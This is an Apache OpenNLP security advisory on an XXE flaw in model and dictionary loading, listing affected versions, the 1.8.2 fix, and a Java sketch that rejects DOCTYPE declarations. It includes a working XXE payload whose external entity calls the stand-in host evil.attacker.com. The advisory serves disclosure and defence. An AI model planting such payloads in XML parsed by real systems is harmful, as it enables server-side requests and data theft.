Severity: Medium
Vendor: The Apache Software Foundation
Versions Affected:
OpenNLP 1.5.0 to 1.5.3
OpenNLP 1.6.0
OpenNLP 1.7.0 to 1.7.2
OpenNLP 1.8.0 to 1.8.1
Description: When loading models or dictionaries that contain XML, it is possible to perform an XML External Entity (XXE) attack. Because OpenNLP is a library, this only affects applications that load models or dictionaries from untrusted sources.
Mitigation: All users who load models or XML dictionaries from untrusted sources should update to 1.8.2.
Example:
An attacker can place this:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://evil.attacker.com/">
]>
<r>&sp;</r>
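Placed inside one of the XML files, either a dictionary or a file embedded inside a model package, this payload demonstrates the vulnerability: when the file is parsed, the external entity sp is resolved and a request is made to the attacker-controlled URL.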
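Applications that parse untrusted XML themselves can reject a payload like this by refusing DOCTYPE declarations outright. The following is a minimal Java sketch using the standard JAXP API. The class name XxeCheck and its methods are hypothetical names chosen for illustration, the feature URI assumes the Xerces-based parser bundled with the JDK, and this is not presented as the change made in OpenNLP 1.8.2.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

// Hypothetical helper, for illustration only.
final class XxeCheck {

    // The payload from the example in this advisory.
    static final String PAYLOAD =
        "<?xml version=\"1.0\" ?>\n"
        + "<!DOCTYPE r [\n"
        + "<!ELEMENT r ANY >\n"
        + "<!ENTITY sp SYSTEM \"http://evil.attacker.com/\">\n"
        + "]>\n"
        + "<r>&sp;</r>";

    // Builds a parser that refuses any document containing a DOCTYPE,
    // so external entities are never declared, let alone resolved.
    static DocumentBuilder newStrictBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Assumption: the parser is Xerces-based and recognizes this feature.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setExpandEntityReferences(false);
        return factory.newDocumentBuilder();
    }

    // Returns true if the strict parser refuses the document.
    static boolean isRejected(String xml) {
        try {
            newStrictBuilder().parse(
                new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXException e) {
            return true; // the parser reported a fatal error, e.g. DOCTYPE disallowed
        } catch (IOException | ParserConfigurationException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println("payload rejected: " + isRejected(PAYLOAD));
        System.out.println("plain XML rejected: " + isRejected("<r>ok</r>"));
    }
}
```

Because the document is refused as soon as the DOCTYPE is seen, the entity is never resolved and no request is sent to the URL in the payload. Rejecting DOCTYPE entirely is the strictest option; it is only suitable when the XML being loaded never legitimately needs a DTD.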
Credit: This issue was discovered by Nishil Shah of Salesforce.
--The Apache OpenNLP Team
02 October 2017